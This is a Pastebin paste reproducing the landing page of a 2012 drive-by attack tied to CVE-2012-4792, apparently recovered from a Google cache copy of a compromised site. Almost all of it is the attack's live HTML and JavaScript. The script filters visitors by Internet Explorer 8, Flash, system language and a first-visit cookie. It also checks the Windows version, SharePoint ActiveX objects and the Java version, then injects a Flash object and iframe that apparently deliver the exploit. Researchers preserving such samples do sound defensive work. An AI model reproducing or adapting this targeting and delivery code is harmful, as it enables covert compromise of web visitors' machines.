eromang

CVE-2012-4792 drive-by version of 7 December

Dec 30th, 2012
2,137
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # This version was found in Google cache as it appeared on 7 Dec 2012 14:12:28 GMT
  2. # https://www.google.com/search?hl=en&source=hp&q=site:cfr.org&btnG=Recherche+Google&meta=&aq=f&aqi=&aql=&oq=&gs_rfai=#q=site:cfr.org+news_14242aa.html&hl=en&safe=off&tbo=d&tbas=0&source=lnt&sa=X&psj=1&ei=Xc3eUOnSPMfR4QT8toCoBg&ved=0CBgQpwUoAA&fp=1&bpcl=40096503&biw=1376&bih=739&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.&cad=b&sei=kxzgUL-oE8rb4QSoxYHYDA
  3.  
  4. <html>
  5. <head>
  6. <script type="text/javascript">var NREUMQ=NREUMQ||[];NREUMQ.push(["mark","firstbyte",new Date().getTime()]);</script>
  7. <script src=deployJava.js></script>
  8. <script type="text/javascript">
  9. function getCookieVal (offset)
  10. {
  11.     var endstr = document.cookie.indexOf (";", offset);
  12.     if (endstr == -1)
  13.     {
  14.         endstr = document.cookie.length;
  15.     }
  16.     return unescape(document.cookie.substring(offset, endstr));
  17. }
  18. function GetCookie (name)
  19. {
  20.     var arg = name + "=";
  21.     var alen = arg.length;
  22.     var clen = document.cookie.length;
  23.     var i = 0;
  24.     while (i < clen)
  25.        {
  26.        var j = i + alen;
  27.        if (document.cookie.substring(i, j) == arg)
  28.           return getCookieVal (j);
  29.        i = document.cookie.indexOf(" ", i) + 1;
  30.        if (i == 0)
  31.           break;
  32.        }
  33.     return null;
  34.     }
  35. function SetCookie (name, value)
  36. {
  37.     var argv = SetCookie.arguments;
  38.     var argc = SetCookie.arguments.length;
  39.     var expires = (2 < argc) ? argv[2] : null;
  40.     var path = (3 < argc) ? argv[3] : null;
  41.     var domain = (4 < argc) ? argv[4] : null;
  42.     var secure = (5 < argc) ? argv[5] : false;
  43.     document.cookie = name + "=" + escape (value) +
  44.       ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
  45.       ((path == null) ? "" : ("; path=" + path)) +
  46.       ((domain == null) ? "" : ("; domain=" + domain)) +
  47.          ((secure == true) ? "; secure" : "");
  48. }
  49. function DisplayInfo()
  50. {
  51.     var expdate = new Date();
  52.     var visit;
  53.     expdate.setTime(expdate.getTime() +  (24 * 60 * 60 * 1000*7 ));
  54.     if(!(visit = GetCookie("visit")))
  55.     visit = 0;
  56.     visit++;
  57.     SetCookie("visit", visit, expdate, "/", null, false);
  58.     return visit;
  59. }
  60. var ua = window.navigator.userAgent.toLowerCase();
  61.  
  62. if (ua.indexOf('msie 8.0') <0)
  63. {
  64.     location.href="about:blank";
  65. }
  66.  
  67.     var f = 0;
  68.     try {
  69.         f = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');
  70.     }
  71.     catch (e) {
  72.     }
  73.     var g=typeof f;
  74.  
  75.     if(g!="object")
  76.     {
  77.         location.href="about:blank";
  78.     }
  79.     var h=navigator.systemLanguage.toLowerCase();
  80.    
  81.     if(h!="zh-cn" && h!="en-us" && h!= "zh-tw")
  82.     {
  83.  
  84.         location.href="about:blank";
  85.     }
  86.  
  87. var num=DisplayInfo();
  88. if(num >1)
  89. {
  90.     location.href="about:blank";
  91. }
  92. function download()
  93. {  
  94.     var xmlhttp;
  95.       try
  96.       {
  97.         xmlhttp = new XMLHttpRequest();
  98.       }
  99.       catch (e)
  100.       {
  101.         var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP','Microsoft.XMLHTTP' );
  102.         var success = false;
  103.         for (var i=0;i < XMLHTTP_IDS.length && !success; i++)
  104.         {
  105.           try
  106.           {
  107.              xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
  108.              success = true;
  109.           } catch (e)
  110.           {}
  111.         }
  112.      }
  113.     function callback()
  114.     {
  115.         if(xmlhttp.readyState==4)
  116.         {
  117.             if(xmlhttp.status==200)
  118.             {
  119.                 var temp=ua.replace(/ /g,"");
  120.                 if (temp.indexOf("nt6.1")>-1) {
  121.                
  122.                
  123.                     var key = "";
  124.                     var ma = 0;
  125.                     try {
  126.                         ma = new ActiveXObject("SharePoint.OpenDocuments.4");
  127.                     }
  128.                     catch (e) {
  129.                     }
  130.                     var mb = 0;
  131.                     try {
  132.                         mb = new ActiveXObject("SharePoint.OpenDocuments.3");
  133.                     }
  134.                     catch (e) {
  135.                     }
  136.                    
  137.                     if ((typeof ma) == "object" && (typeof mb) == "object") {
  138.                         key = "girl";  
  139.                     }
  140.                     else if ((typeof ma) == "number" && (typeof mb) == "object") {
  141.                         key = "boy";    
  142.                     }
  143.                    
  144.                    
  145.                     if (key == "girl") {    
  146.            
  147.                         document.getElementById('test').innerHTML="true";  
  148.                         document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  149.                        
  150.                     }
  151.                     if (key == "boy") {    
  152.                     document.getElementById('test').innerHTML="false";
  153.                         document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  154.                        
  155.                     }
  156.                    
  157.                     if (key == "") {
  158.                         if ((deployJava.versionCheck('1.6.0+') == true) && (deployJava.versionCheck('1.7.0+') == false)) {
  159.                        
  160.                            
  161.                             document.getElementById('test').innerHTML="default";
  162.                             document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  163.                            
  164.                         }
  165.                     }
  166.                 }
  167.                 if(temp.indexOf("nt5.1")>-1)
  168.                 {
  169.                
  170.                     document.getElementById('test').innerHTML="cat";
  171.                     document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  172.                            
  173.                 }  
  174.                
  175.            
  176.             }
  177.         }
  178.     }
  179.     xmlhttp.open("get", "xsainfo.jpg", true);  
  180.     xmlhttp.onreadystatechange = callback;
  181.     xmlhttp.send(null);
  182. }
  183.  
  184. </script>
  185. </head>
  186. <body onload="download()">
  187. <div id=test>hello</div>
  188. <script type="text/javascript">if(!NREUMQ.f){NREUMQ.f=function(){NREUMQ.push(["load",new Date().getTime()]);var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://d1ros97qkrwjf5.cloudfront.net/42/eum/rum.js";document.body.appendChild(e);if(NREUMQ.a)NREUMQ.a();};NREUMQ.a=window.onload;window.onload=NREUMQ.f;};NREUMQ.push(["nrf2","beacon-1.newrelic.com","864c0a0685","1597576","MlEAN0FYDUoEUUYKXAsbNxFaFglKSlhBTF0AQxE8Ag1RDVdTU01bEVkO",0,0,new Date().getTime()]);</script>
  189. </body>
  190. </html>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×